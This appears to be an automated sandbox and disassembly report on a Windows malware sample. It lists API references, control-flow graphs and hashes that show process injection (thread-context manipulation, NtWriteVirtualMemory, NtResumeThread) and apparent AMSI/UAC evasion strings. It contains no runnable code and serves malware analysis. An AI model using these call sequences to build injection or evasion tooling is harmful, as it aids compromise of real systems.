                • Opcode ID: b43ccc2c3fcc8fc687ecbca91d41f314aa36506c60080a0538e3a171026b4f29
                • Instruction ID: a732921242bde975653db3d043f93749edc753202b21d94ed66ef6a0a713587b
                • Opcode Fuzzy Hash: b43ccc2c3fcc8fc687ecbca91d41f314aa36506c60080a0538e3a171026b4f29
                • Instruction Fuzzy Hash: CA519B7DA012418FEB16CF6C998C766BBD0AB46318F1885AEE54CCB3C7E7708545CBA1

                Control-flow Graph

                APIs
                • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 0287E86A
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.2513248128.0000000002861000.00000020.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                • Associated: 00000001.00000002.2513234269.0000000002860000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513297669.000000000288E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513359092.00000000028C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B7000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B9000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_2860000_UTstKgkJNY.jbxd
                Similarity
                • API ID: CheckConnectionInternet
                • String ID: Initialize$OpenSession$ScanBuffer
                • API String ID: 3847983778-3852638603
                • Opcode ID: 0b6e1c0987cb1879cb391a4fce5dfd9509af094d4956129ed70ef84e319fd51d
                • Instruction ID: afbd42b7c223309396ec588f6537a6d20f3eb1ee82b37b4fc8d136872f415eb2
                • Opcode Fuzzy Hash: 0b6e1c0987cb1879cb391a4fce5dfd9509af094d4956129ed70ef84e319fd51d
                • Instruction Fuzzy Hash: D6411D3DB501089FEB20EBA8D885AAEB7FAEF48710F214475E401E7351DA74ED058F12

                Control-flow Graph

                APIs
                • LoadLibraryA.KERNEL32(00000000,00000000,02878903), ref: 02878850
                • GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02878903), ref: 02878860
                • GetProcAddress.KERNEL32(743E0000,00000000), ref: 02878879
                  • Part of subcall function 02877CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02877D6C
                • FreeLibrary.KERNEL32(743E0000,00000000,028C2388,Function_000065D8,00000004,028C2398,028C2388,000186A3,00000040,028C239C,743E0000,00000000,00000000,00000000,00000000,02878903), ref: 028788E3
                Memory Dump Source
                • Source File: 00000001.00000002.2513248128.0000000002861000.00000020.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                • Associated: 00000001.00000002.2513234269.0000000002860000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513297669.000000000288E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513359092.00000000028C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B7000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B9000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_2860000_UTstKgkJNY.jbxd
                Similarity
                • API ID: Library$AddressFreeHandleLoadMemoryModuleProcVirtualWrite
                • String ID:
                • API String ID: 1543721669-0
                • Opcode ID: d90afe2c897e7e33c8ab62a6d037378ae29596df585196893df63cfaa7189c79
                • Instruction ID: 841f6213abebf75da4148d7af78518983770d266356b20156e593e676fc58f4d
                • Opcode Fuzzy Hash: d90afe2c897e7e33c8ab62a6d037378ae29596df585196893df63cfaa7189c79
                • Instruction Fuzzy Hash: 7711847CA40305ABE710FBBCDC0AA2E77A9EB45700F6004657A04EB7E4DB78D9008B56

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 5855 286e2e4-286e2f0 5856 286e2f2-286e2f8 VariantClear call 286dfb0 5855->5856 5857 286e2ff-286e304 5855->5857 5861 286e2fd 5856->5861 5859 286e306-286e313 call 28644ac 5857->5859 5860 286e315-286e31a 5857->5860 5867 286e35b-286e35e 5859->5867 5863 286e326-286e32b 5860->5863 5864 286e31c-286e324 5860->5864 5861->5867 5865 286e336-286e341 call 2872e24 5863->5865 5866 286e32d-286e334 call 286e168 5863->5866 5864->5867 5874 286e343-286e34d 5865->5874 5875 286e34f-286e356 VariantClear VariantInit 5865->5875 5866->5867 5874->5867 5875->5867
                APIs
                Memory Dump Source
                • Source File: 00000001.00000002.2513248128.0000000002861000.00000020.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                • Associated: 00000001.00000002.2513234269.0000000002860000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513297669.000000000288E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513359092.00000000028C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B7000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B9000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_2860000_UTstKgkJNY.jbxd
                Similarity
                • API ID: ClearVariant
                • String ID:
                • API String ID: 1473721057-0
                • Opcode ID: 382f18e17581564f270b2c60ddd1b56ea66f69e7fe7fbae0cae205b822bc86aa
                • Instruction ID: 3dafad2343fc8b09ff201213bf983155a1b145e7d0be84347814f8df60944065
                • Opcode Fuzzy Hash: 382f18e17581564f270b2c60ddd1b56ea66f69e7fe7fbae0cae205b822bc86aa
                • Instruction Fuzzy Hash: 13F0C22C708218CBDB217B3D8B8CD7D239A5F01704B5C1426A44ADB20DCB24DC45CB63

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 5877 287705c-28770a6 call 2864eec 5880 28770bf-28770c1 5877->5880 5881 28770a8-28770ba call 286afc8 call 2863e68 5877->5881 5883 28770c7-28770db 5880->5883 5884 2877288-28772af 5880->5884 5881->5880 5888 28770dd-28770f7 5883->5888 5886 28772b1-28772c0 5884->5886 5887 28772d9-28772dc 5884->5887 5890 28772c7-28772d7 5886->5890 5891 28772c2 5886->5891 5892 28772de-28772e0 5887->5892 5893 28772ed-2877309 5887->5893 5894 2877111-2877115 5888->5894 5895 28770f9-287710c 5888->5895 5890->5893 5891->5890 5892->5893 5898 28772e2-28772e6 5892->5898 5903 287730e-2877310 5893->5903 5896 2877117-2877126 5894->5896 5897 287718b-287718d 5894->5897 5899 287727f-2877282 5895->5899 5901 2877158-2877180 call 286535c 5896->5901 5902 2877128-2877156 call 286535c 5896->5902 5904 28771d4-28771d8 5897->5904 5905 287718f-2877193 5897->5905 5898->5893 5900 28772e8 5898->5900 5899->5884 5899->5888 5900->5893 5925 2877183-2877186 5901->5925 5902->5925 5907 2877312-2877315 call 2877634 5903->5907 5908 287731a-287731f 5903->5908 5912 287724d-2877264 5904->5912 5913 28771da-28771e2 5904->5913 5910 28771b7-28771cf 5905->5910 5911 2877195-287719f 5905->5911 5907->5908 5921 2877321-287732e 5908->5921 5922 287733d-287734f 5908->5922 5919 287727b 5910->5919 5911->5910 5923 28771a1-28771b2 call 286ea58 5911->5923 5918 2877266-287726a 5912->5918 5912->5919 5914 28771e4-2877220 call 286535c 5913->5914 5915 2877222-287724b 5913->5915 5914->5919 5915->5919 5918->5919 5926 287726c-2877278 5918->5926 5919->5899 5927 2877330-2877334 call 2865338 5921->5927 5928 2877339-287733b 5921->5928 5933 2877363 5922->5933 5934 2877351-2877361 SysFreeString 5922->5934 5923->5910 5925->5919 5926->5919 5927->5928 5928->5921 5928->5922 5934->5933 5934->5934
                APIs
                • SysFreeString.OLEAUT32(?), ref: 0287735A
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.2513248128.0000000002861000.00000020.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                • Associated: 00000001.00000002.2513234269.0000000002860000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513297669.000000000288E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513359092.00000000028C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B7000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B9000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_2860000_UTstKgkJNY.jbxd
                Similarity
                • API ID: FreeString
                • String ID: H
                • API String ID: 3341692771-2852464175
                • Opcode ID: b8b17068e042b87e1a7b8b6957d12790bfd9c08043de6a150f64af3524883bb8
                • Instruction ID: 0d9c9f9d68cfb3fa204f77c9b5640268a8db7b24beac519487ad34c2a18169b9
                • Opcode Fuzzy Hash: b8b17068e042b87e1a7b8b6957d12790bfd9c08043de6a150f64af3524883bb8
                • Instruction Fuzzy Hash: 77B1BF78A016089FDB15CF98D884AADFBF2FF4A314F248169E919EB364D730A845CF50

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 5935 286e37c-286e38c 5936 286e38e-286e47c call 286e37c 5935->5936 5937 286e3ab-286e3af 5935->5937 5939 286e3b1-286e3b6 5937->5939 5940 286e3b8-286e3c4 VariantInit 5937->5940 5942 286e3c7-286e3e0 5939->5942 5940->5942 5944 286e3e2 5942->5944 5945 286e3f0-286e3f5 5942->5945 5946 286e3e4-286e3e7 5944->5946 5947 286e3fc-286e403 5944->5947 5945->5947 5948 286e3f7-286e3fa 5945->5948 5946->5947 5949 286e3e9-286e3ec 5946->5949 5951 286e447-286e458 5947->5951 5952 286e405-286e412 call 28774c5 5947->5952 5948->5947 5950 286e41d-286e429 call 2872e24 5948->5950 5949->5947 5954 286e3ee 5949->5954 5960 286e442 call 286dc18 5950->5960 5961 286e42b-286e440 5950->5961 5958 286e46f 5951->5958 5959 286e45a-286e46a call 286e78c call 286e360 5951->5959 5956 286e418-286e41b 5952->5956 5954->5950 5956->5951 5959->5958 5960->5951 5961->5951
                APIs
                Memory Dump Source
                • Source File: 00000001.00000002.2513248128.0000000002861000.00000020.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                • Associated: 00000001.00000002.2513234269.0000000002860000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513297669.000000000288E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513359092.00000000028C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B7000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B9000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_2860000_UTstKgkJNY.jbxd
                Similarity
                • API ID: InitVariant
                • String ID:
                • API String ID: 1927566239-0
                • Opcode ID: 0acfa5264bef9156d44f6edfe0cdbf1992749bde336f1e3ba6bd8157f19de3eb
                • Instruction ID: a668b60997c5b969ffcb0c5e51242779cae3294fe3d5d510166eac9a1fe5f839
                • Opcode Fuzzy Hash: 0acfa5264bef9156d44f6edfe0cdbf1992749bde336f1e3ba6bd8157f19de3eb
                • Instruction Fuzzy Hash: 7F314D7EA04608ABDB10DEACC98CEBA77A9FB0C304F584561E909D7684D335D990CB66
                APIs
                • CLSIDFromProgID.OLE32(00000000,?,00000000,02876D39,?,?,?,00000000), ref: 02876D19
                  • Part of subcall function 02864C0C: SysFreeString.OLEAUT32(0287ED84), ref: 02864C1A
                Memory Dump Source
                • Source File: 00000001.00000002.2513248128.0000000002861000.00000020.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                • Associated: 00000001.00000002.2513234269.0000000002860000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513297669.000000000288E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513359092.00000000028C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B7000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B9000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_2860000_UTstKgkJNY.jbxd
                Similarity
                • API ID: FreeFromProgString
                • String ID:
                • API String ID: 4225568880-0
                • Opcode ID: abf15b4907e5f509614c174727b168e8c9fac60601eb6cc35f3bddc6238abc03
                • Instruction ID: 1c966b2eb3ab35c99d4ff97baf210fa0329a3d1b60cbf38fb214593c1f0f5347
                • Opcode Fuzzy Hash: abf15b4907e5f509614c174727b168e8c9fac60601eb6cc35f3bddc6238abc03
                • Instruction Fuzzy Hash: E8E0653D614714BFF721EBA9CC5596E7BAEDB89B10B514471A804D7600E675BD0088A1
                APIs
                • GetModuleFileNameA.KERNEL32(02860000,?,00000105), ref: 02865832
                  • Part of subcall function 02865A78: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02860000,0288E790), ref: 02865A94
                  • Part of subcall function 02865A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02860000,0288E790), ref: 02865AB2
                  • Part of subcall function 02865A78: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02860000,0288E790), ref: 02865AD0
                  • Part of subcall function 02865A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02865AEE
                  • Part of subcall function 02865A78: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02865B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02865B37
                  • Part of subcall function 02865A78: RegQueryValueExA.ADVAPI32(?,02865CE4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02865B7D,?,80000001), ref: 02865B55
                  • Part of subcall function 02865A78: RegCloseKey.ADVAPI32(?,02865B84,00000000,?,?,00000000,02865B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02865B77
                Memory Dump Source
                • Source File: 00000001.00000002.2513248128.0000000002861000.00000020.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                • Associated: 00000001.00000002.2513234269.0000000002860000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513297669.000000000288E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513359092.00000000028C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B7000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B9000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_2860000_UTstKgkJNY.jbxd
                Similarity
                • API ID: Open$FileModuleNameQueryValue$Close
                • String ID:
                • API String ID: 2796650324-0
                • Opcode ID: b28d12baadab1e4308946262d595483018c342fe3ea7939c094ad429c1d6dced
                • Instruction ID: 9456f1ff5e1ed2a20f28e8c6d4636c96f448a5d1799d664a4eed741b50505064
                • Opcode Fuzzy Hash: b28d12baadab1e4308946262d595483018c342fe3ea7939c094ad429c1d6dced
                • Instruction Fuzzy Hash: 07E06579A002148BCB10DE6CC8C8AA737D8AB08B50F8009A5ED58DF34AD3B5D9208BE1
                APIs
                • GetFileAttributesA.KERNEL32(00000000,?,0287FD00,ScanString,028C237C,0288B40C,OpenSession,028C237C,0288B40C,ScanString,028C237C,0288B40C,UacScan,028C237C,0288B40C,UacInitialize), ref: 02867E1B
                Memory Dump Source
                • Source File: 00000001.00000002.2513248128.0000000002861000.00000020.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                • Associated: 00000001.00000002.2513234269.0000000002860000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513297669.000000000288E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513359092.00000000028C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B7000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B9000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_2860000_UTstKgkJNY.jbxd
                Similarity
                • API ID: AttributesFile
                • String ID:
                • API String ID: 3188754299-0
                • Opcode ID: 81e72d02e34d49699fbcea4f3e8a1facf21165fd85f6b10d0c15ae5a9543b4f5
                • Instruction ID: f89ec0bd19ac1e014958f4b7656dccd1edc795d14135b25a74f16bf51b1ae5b4
                • Opcode Fuzzy Hash: 81e72d02e34d49699fbcea4f3e8a1facf21165fd85f6b10d0c15ae5a9543b4f5
                • Instruction Fuzzy Hash: 53C08CEC2122020A1A60A1FC0CCE13A5288890413D3A42F21E23CDA2E2E325882B2822
                APIs
                • SysFreeString.OLEAUT32(0287ED84), ref: 02864C1A
                • SysReAllocStringLen.OLEAUT32(0288C2B4,0287ED84,000000B4), ref: 02864C62
                Memory Dump Source
                • Source File: 00000001.00000002.2513248128.0000000002861000.00000020.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                • Associated: 00000001.00000002.2513234269.0000000002860000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513297669.000000000288E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513359092.00000000028C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B7000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B9000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_2860000_UTstKgkJNY.jbxd
                Similarity
                • API ID: String$AllocFree
                • String ID:
                • API String ID: 344208780-0
                • Opcode ID: 34a044716cc047832c89a5cdbf8a1cf543af0314eed8eb6eb3cc9569b15b6366
                • Instruction ID: 75dee48308bd79d89973dae2d70777f85189e5532a966645fd3b08944e6bbc14
                • Opcode Fuzzy Hash: 34a044716cc047832c89a5cdbf8a1cf543af0314eed8eb6eb3cc9569b15b6366
                • Instruction Fuzzy Hash: 23D0127C5001025DBA3C9A99854C93E626B99D070A748C299980ACA341EB329400CA31
                APIs
                • timeSetEvent.WINMM(00002710,00000000,0288BF78,00000000,00000001), ref: 0288BF94
                Memory Dump Source
                • Source File: 00000001.00000002.2513248128.0000000002861000.00000020.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                • Associated: 00000001.00000002.2513234269.0000000002860000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513297669.000000000288E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513359092.00000000028C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B7000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B9000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_2860000_UTstKgkJNY.jbxd
                Similarity
                • API ID: Eventtime
                • String ID:
                • API String ID: 2982266575-0
                • Opcode ID: cba7d7dd76727bb7611cdb105db99a40c08d03f7f81900a188af4e539bd3ceaa
                • Instruction ID: d6191bbce070c36fbfa4216db0abe0f8906cc78dbd9e27964acdc940f4929cf2
                • Opcode Fuzzy Hash: cba7d7dd76727bb7611cdb105db99a40c08d03f7f81900a188af4e539bd3ceaa
                • Instruction Fuzzy Hash: 9CC092F87C83807EFE10A6BD2DC6F37128EDB44B01F200452BB00EE2C2D1E268508A24
                APIs
                • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,02861A03), ref: 028615E2
                Memory Dump Source
                • Source File: 00000001.00000002.2513248128.0000000002861000.00000020.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                • Associated: 00000001.00000002.2513234269.0000000002860000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513297669.000000000288E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513359092.00000000028C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B7000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B9000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_2860000_UTstKgkJNY.jbxd
                Similarity
                • API ID: AllocVirtual
                • String ID:
                • API String ID: 4275171209-0
                • Opcode ID: 6f07f08b8696f41568e4c2377d6892535cc7be8a9170086e5be3caf1750a58de
                • Instruction ID: 8331a975db242f1e97520b4f476480691fcdc519c064901f0a3199a3ef001978
                • Opcode Fuzzy Hash: 6f07f08b8696f41568e4c2377d6892535cc7be8a9170086e5be3caf1750a58de
                • Instruction Fuzzy Hash: 77F037F8B413404BDB06CF799D483166BD2EB89348F1085BEE709DBBE9E77184018B08
                APIs
                • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004), ref: 028616A4
                Memory Dump Source
                • Source File: 00000001.00000002.2513248128.0000000002861000.00000020.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                • Associated: 00000001.00000002.2513234269.0000000002860000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513297669.000000000288E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513359092.00000000028C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B7000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B9000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_2860000_UTstKgkJNY.jbxd
                Similarity
                • API ID: AllocVirtual
                • String ID:
                • API String ID: 4275171209-0
                • Opcode ID: dffa93646924625eb4c4652f7fe769ec3d74167a0a357ccb22f2afaa7eb1521f
                • Instruction ID: 8fd2381e8a8eb48c8e8f1f15177c3c0d7f9df49046d410fb6f6aa1b82efe8a6b
                • Opcode Fuzzy Hash: dffa93646924625eb4c4652f7fe769ec3d74167a0a357ccb22f2afaa7eb1521f
                • Instruction Fuzzy Hash: FCF090BEF406956BD7109F5A9CC8792BBA4FB00355F154139EA0CD7386D7B0A8108B94
                APIs
                • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,02861FE4), ref: 02861704
                Memory Dump Source
                • Source File: 00000001.00000002.2513248128.0000000002861000.00000020.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                • Associated: 00000001.00000002.2513234269.0000000002860000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513297669.000000000288E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513359092.00000000028C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B7000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B9000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_2860000_UTstKgkJNY.jbxd
                Similarity
                • API ID: FreeVirtual
                • String ID:
                • API String ID: 1263568516-0
                • Opcode ID: 72f8d9e2be9a2d1b2d650c4875233ecff48916526749771658493ffd59b20421
                • Instruction ID: 738ff185e3c5def87f06928970f3bee90f68713b1f3d5b9aa483853048186c20
                • Opcode Fuzzy Hash: 72f8d9e2be9a2d1b2d650c4875233ecff48916526749771658493ffd59b20421
                • Instruction Fuzzy Hash: 4FE0867D3003016FD7105B7D5D8D722ABD9EB54654F284475F509DB387D7A0E8108B60
                APIs
                • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,0287ABDB,?,?,0287AC6D,00000000,0287AD49), ref: 0287A968
                • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0287A980
                • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 0287A992
                • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 0287A9A4
                • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 0287A9B6
                • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 0287A9C8
                • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 0287A9DA
                • GetProcAddress.KERNEL32(00000000,Process32First), ref: 0287A9EC
                • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0287A9FE
                • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 0287AA10
                • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 0287AA22
                • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 0287AA34
                • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 0287AA46
                • GetProcAddress.KERNEL32(00000000,Module32First), ref: 0287AA58
                • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0287AA6A
                • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 0287AA7C
                • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 0287AA8E
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.2513248128.0000000002861000.00000020.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                • Associated: 00000001.00000002.2513234269.0000000002860000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513297669.000000000288E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513359092.00000000028C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B7000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.2513395714.00000000029B9000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_2860000_UTstKgkJNY.jbxd
                Similarity
                • API ID: AddressProc$HandleModule
                • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                • API String ID: 667068680-597814768
                • Opcode ID: f17adf9d831554bf7fb016b5a03fdafd8ebff0cb81ec520005c1ebd40a8bb3bf
                • Instruction ID: 9bd3049141c05e93322ac072c557f140159013e8f964b6d62856bb303968b262
                • Opcode Fuzzy Hash: f17adf9d831554bf7fb016b5a03fdafd8ebff0cb81ec520005c1ebd40a8bb3bf
                • Instruction Fuzzy Hash: 3931B2BC9807709FFB44DFB8E8A9A2B37A9EF157017104965A401CF289E77CD4108F92
                APIs
                  • Part of subcall function 0287881C: LoadLibraryA.KERNEL32(00000000,00000000,02878903), ref: 02878850
                  • Part of subcall function 0287881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02878903), ref: 02878860
                  • Part of subcall function 0287881C: GetProcAddress.KERNEL32(743E0000,00000000), ref: 02878879
                  • Part of subcall function 0287881C: FreeLibrary.KERNEL32(743E0000,00000000,028C2388,Function_000065D8,00000004,028C2398,028C2388,000186A3,00000040,028C239C,743E0000,00000000,00000000,00000000,00000000,02878903), ref: 028788E3
                • GetThreadContext.KERNEL32(00000000,028C2420,ScanString,028C23A4,0287A774,UacInitialize,028C23A4,0287A774,ScanBuffer,028C23A4,0287A774,ScanBuffer,028C23A4,0287A774,UacInitialize,028C23A4), ref: 0287943A
                  • Part of subcall function 02877CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02877D6C
                • SetThreadContext.KERNEL32(00000000,028C2420,ScanBuffer,028C23A4,0287A774,ScanString,028C23A4,0287A774,Initialize,028C23A4,0287A774,00000000,-00000008,028C24F8,00000004,028C24FC), ref: 0287A14F
                • NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,028C2420,ScanBuffer,028C23A4,0287A774,ScanString,028C23A4,0287A774,Initialize,028C23A4,0287A774,00000000,-00000008,028C24F8), ref: 0287A15C
                  • Part of subcall function 02878798: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,028C23A4,0287A3BF,ScanString,028C23A4,0287A774,ScanBuffer,028C23A4,0287A774,Initialize,028C23A4,0287A774,UacScan), ref: 028787AC
                  • Part of subcall function 02878798: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 028787C6
                  • Part of subcall function 02878798: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,028C23A4,0287A3BF,ScanString,028C23A4,0287A774,ScanBuffer,028C23A4,0287A774,Initialize), ref: 02878802
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.2513248128.0000000002861000.00000020.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
